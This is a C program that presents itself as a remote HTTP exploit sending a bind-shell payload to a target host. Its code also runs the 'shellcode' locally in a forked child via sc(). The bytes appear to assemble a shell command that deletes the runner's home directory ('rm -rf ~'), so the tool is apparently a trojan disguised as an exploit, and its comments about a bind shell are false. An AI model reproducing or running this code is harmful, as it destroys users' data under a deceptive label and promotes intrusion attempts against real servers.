#include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <string.h> #include <unistd.h> #include <stdlib.h> void usage(char *argv[]) { printf("Usage: %s <hostname> <port>\n\n",argv[0]); exit(1); } int main(int argc,char *argv[]) { // we_are_evil_we_are_evil_bindshell_31337_shellcode_in_91_bytes:> char *shellcode= "\xb8\xff\x2f\x73\x68\xc1\xe8\x08\x50" "\xb8\x2f\x62\x69\x6e\x50\x89\xe3\x31\xc0\x50" "\x66\xb8\x71\x71\x66\x35\x51\x51\x66\x50" "\xb8\x23\x37\x71\x2f\x35\x51\x51\x51\x51\x50" "\xb8\x23\x3c\x71\x7c\x35\x51\x51\x51\x51\x50\x89\xe1\x31\xc0\x50" "\x66\xb8\x2d\x63\x66\x50\x89\xe2\x31\xc0\xb0\x64\x29\xc4\x31\xc0\x50\x51\x52\x53" "\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd\x80\xb4\x01\x31\xdb\xcd\x80"; int (*sc)()=(int(*)())shellcode; char host[100]; int sd; struct sockaddr_in sin; struct sockaddr_in pin; struct hostent *hp; // assuming PAGE_SIZE==4096 which is the most common case. char *evilreq=malloc(4096); pid_t pid; if (argc!=3) usage(argv); strcpy(host,argv[1]); if ((hp = gethostbyname(host)) == 0) { perror("gethostbyname"); exit(2); } memset(&pin, 0, sizeof(pin)); pin.sin_family = AF_INET; pin.sin_addr.s_addr = ((struct in_addr *)(hp->h_addr))->s_addr; pin.sin_port = htons(atoi(argv[2])); if ((sd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket"); exit(1); } if (connect(sd,(struct sockaddr *) &pin, sizeof(pin)) == -1) { perror("connect"); exit(3); } printf("Connected, sending out the evil request...\n"); // prepare teh evil request sprintf(evilreq,"GET / HTTP/1.0\nAccept-Encoding: x-compress; x-zip\nCache-Control: max-age=-12312312%%s%91s\n\n",shellcode); if (send(sd, evilreq, strlen(evilreq), 0) == -1) { perror("send"); exit(1); } printf("Waiting some seconds to see if we got shell...\n"); pid=fork(); if (pid==0) {close(2);sc();exit(0);} else { sleep(2); if (sd) { printf("Now type nc %s 12345 to see if you've got shell there\n",argv[1]); close(sd); } } }